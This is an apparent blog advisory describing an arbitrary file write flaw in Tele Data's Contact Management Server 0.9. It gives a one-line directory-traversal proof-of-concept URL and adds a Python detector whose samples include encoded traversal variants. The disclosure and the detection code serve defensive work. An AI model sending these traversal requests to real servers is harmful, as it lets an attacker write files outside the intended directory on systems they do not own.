This site is soon to be deprecated by http://www.johnleitch.net

Sunday, May 23, 2010

Tele Data's Contact Management Server 0.9 Arbitrary File Write

An arbitrary file write vulnerability in Tele Data's Contact Management Server 0.9 can be exploited to write to the local file system of the server.

PoC
Log in as an administrator and navigate to http://localhost/command.html?Cmd=SQL_Save&SQL=hello%20world&FileName=..\..\..\..\..\..\..\..\..\x.txt
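
Detection sketch for the request above, as an added example that is not part of the original advisory or the vendor's code: it flags command.html SQL_Save requests whose FileName resolves outside the intended save directory. BASE_DIR, the function names and every sample request except the first are assumptions made for illustration.

```python
import ntpath
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: the directory the server is meant to save into (not given in the advisory).
BASE_DIR = r"C:\CMS\saved"

def outside_base(file_name, base_dir=BASE_DIR):
    """True unless file_name resolves, under Windows path rules, strictly inside base_dir."""
    prev = None
    while prev != file_name:  # undo nested encoding such as %252e%252e%255c
        prev, file_name = file_name, unquote(file_name)
    # ntpath applies Windows semantics ("\" and "/" separators, drive letters)
    # even when the logs are analysed on a non-Windows host.
    target = ntpath.normcase(ntpath.normpath(ntpath.join(base_dir, file_name)))
    base = ntpath.normcase(ntpath.normpath(base_dir))
    return not target.startswith(base + "\\")

def flag_request(url):
    """True for a command.html SQL_Save request whose FileName leaves BASE_DIR."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/command.html"):
        return False
    # Assumption: parameter names may be matched loosely by the server, so lower-case them.
    qs = {k.lower(): v for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    if "sql_save" not in (c.lower() for c in qs.get("cmd", [])):
        return False
    return any(outside_base(f) for f in qs.get("filename", []))

# Constructed sample requests; the first is the request from the PoC above.
SAMPLES = [
    r"http://localhost/command.html?Cmd=SQL_Save&SQL=hello%20world&FileName=..\..\..\..\..\..\..\..\..\x.txt",
    "/command.html?Cmd=SQL_Save&SQL=select%201&FileName=report.sql",
    "/command.html?Cmd=SQL_Save&SQL=x&FileName=%252e%252e%255cx.txt",
    "/command.html?Cmd=SQL_Save&SQL=x&FileName=C:%5Cx.txt",
]

def scan(urls):
    """Return the requests that should raise an alert."""
    return [u for u in urls if flag_request(u)]

if __name__ == "__main__":
    for hit in scan(SAMPLES):
        print("ALERT", hit)
```

The same outside_base check, applied server-side before the file is opened, is the containment test a fix for this class of bug needs.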
